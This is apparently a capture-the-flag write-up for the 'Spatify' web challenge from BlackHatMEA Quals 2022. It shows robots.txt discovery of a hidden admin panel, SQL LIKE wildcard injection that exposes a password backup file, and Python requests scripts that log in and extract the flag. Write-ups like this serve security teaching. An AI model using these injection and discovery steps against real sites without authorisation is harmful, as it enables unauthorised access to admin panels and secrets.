Diefunction
  • About
  • Vulnerabilities
    • GHSL-2021-023 / CVE-2021-32819
  • BlachatMEA Finals 2024
  • CTF
    • Technology Control Company
      • Athackcon CTF 2021
        • Trust
        • Config
        • Extend
        • Poison
      • Blackhat MEA 2022
        • CTF Setup on Kali linux
        • Careers
        • SOC Complaints
    • Athackcon
      • POLL
    • Cyber Night 3
      • Client Hell
    • BlackHatMEA Quals 2022
      • Spatify
      • PeehPee
      • Meme generator
      • Black notes
      • Jimmy's blog
    • BlackHatMEA Quals 2023
      • Web - Hardy
      • Web - Authy
      • Reverse engineering - light up the server
    • BlackhatMEA Finals 2024
      • PWN
    • BITSCTF - Reverse Mishap
    • Cybernights 2025
      • REVERSE
      • PWN
    • BYUCTF 2025
      • PWN
Powered by GitBook
On this page
  • Difficulty
  • Points
  • Description
  • Quick Analysis
  • Spatify robots.txt file discovery
  • What is a robots.txt file used for? [1]
  • Content of robots.txt
  • Spatify's admin panel
  • Spatify search engine
  • The SQL LIKE Operator [2]
  • Exploitation
  • SQL wildcard injection
  • Content of secret_password_backup.txt.bak
  • The flag
  • References

Was this helpful?

  1. CTF
  2. BlackHatMEA Quals 2022

Spatify

PreviousBlackHatMEA Quals 2022NextPeehPee

Last updated 2 years ago

Was this helpful?

Difficulty

Easy

Points

150

Description

Welcome to spatify, the perfect place to enjoy some royalty-free music with neither ads nor vulnerabilities at all!

Quick Analysis

Spatify robots.txt file discovery

After running the Burpsuite crawler, or any crawler, the crawler discovered a /robots.txt file.

What is a robots.txt file used for?

The robots.txt file tells search engine crawlers which URLs the crawler can access on your site.

Content of robots.txt

from requests import get, post
url = 'https://blackhat4-944f71937411184fb04dddb0c9371eb1-0.chals.bh.ctf.sa'
file = '/robots.txt'
response = get(url + file)
print(response.text)
User-agent: *
Disallow: /superhiddenadminpanel/

Spatify's admin panel

The Spatify admin panel /superhiddenadminpanel/ can only be access via a password.

Spatify search engine

The Spatify home page / search for music based on the music name. Default listed music

<div class="mb-2"><b>[FEATURED] Goldn - Praz Khanal</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/goldn.mp3" type="audio/mpeg">
    </audio>
</div>

<div class="mb-2"><b>[FEATURED] Guitar Electro Sport Trailer - Gvidon</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/guitar.mp3" type="audio/mpeg">
    </audio>
</div>

<div class="mb-2"><b>[FEATURED] Learn SQL in 3 minutes</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/learn_sql.mp3" type="audio/mpeg">
    </audio>
</div>

Analyze the search SQL Query

The search requires input with at least five characters. The common word between all three music names is FEATURED. The result of FEATURED search is the same as the home page default music. I assume the SQL Query querying is based on LIKE operator.

The LIKE operator is used in a WHERE clause to search for a specified pattern in a column.

There are two wildcards often used in conjunction with the LIKE operator:

  • The percent sign (%) represents zero, one, or multiple characters

  • The underscore sign (_) represents one, single character

LIKE syntax

SELECT column1, column2, ...
FROM table_name
WHERE columnN LIKE pattern; 

Spotify Search with SQL Wildcards

The result of FEATURE% search is the same as the home page default music, which means the query is injectable with SQL wildcards.

Exploitation

SQL wildcard injection

List all music records with wildcards with five percent signs %. q=%%%%%%

<div class="mb-2"><b>😋 🅟🅐🅢🅢🅦🅞🅡🅓 🅑🅐🅒🅚🅤🅟 😋</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/secret_password_backup.txt.bak" type="audio/mpeg">
    </audio>
</div>

<div class="mb-2"><b>[FEATURED] Goldn - Praz Khanal</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/goldn.mp3" type="audio/mpeg">
    </audio>
</div>

<div class="mb-2"><b>[FEATURED] Guitar Electro Sport Trailer - Gvidon</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/guitar.mp3" type="audio/mpeg">
    </audio>
</div>

<div class="mb-2"><b>[FEATURED] Learn SQL in 3 minutes</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/learn_sql.mp3" type="audio/mpeg">
    </audio>
</div>

Content of secret_password_backup.txt.bak

file = '/static/audio/secret_password_backup.txt.bak'
response = get(url + file)
print(response.text)
THISISTHEPASSWORDTOTHEADMINPANEL123321123321

The flag

import re
endpoint = '/superhiddenadminpanel/'
data = { 'password': 'THISISTHEPASSWORDTOTHEADMINPANEL123321123321' }
response = post(url + endpoint, data = data)
html = response.text
flag = re.search('BlackHatMEA{(.*)}', html)
print(flag.group(0))
BlackHatMEA{551:14:dc339129777027c07c8c63bd0310f7da6d9074a6}

References

  • https://developers.google.com/search/docs/crawling-indexing/robots/intro

  • https://www.w3schools.com/sql/sql_like.asp

The SQL LIKE Operator

[1]
[2]